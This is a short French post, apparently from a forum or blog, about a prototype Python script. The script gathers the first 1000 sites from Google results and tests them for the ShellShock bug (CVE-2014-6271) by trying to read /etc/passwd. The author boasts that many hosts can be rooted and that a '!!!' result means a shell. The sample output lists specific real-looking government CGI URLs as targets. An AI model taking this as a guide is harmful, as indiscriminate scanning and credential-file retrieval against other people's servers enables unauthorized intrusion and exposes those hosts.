
Utiliser Google pour scanner les sites à la recherche de "ShellShock" (CVE-2014-6271)
sudo pip install shellJ'utilise google pour rechercher les 1000 premiers sites et tenter d'obtenir le /etc/passwd
Après test, il y a de très très très nombreux hôtes qui peuvent être rootés !!!!
En passant, ce n'est qu'un proto, il a des faux positifs.
Sortie comme ceci :
si le deuxième champ est !!!, alors Vous pouvez obtenir un SHELL !
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir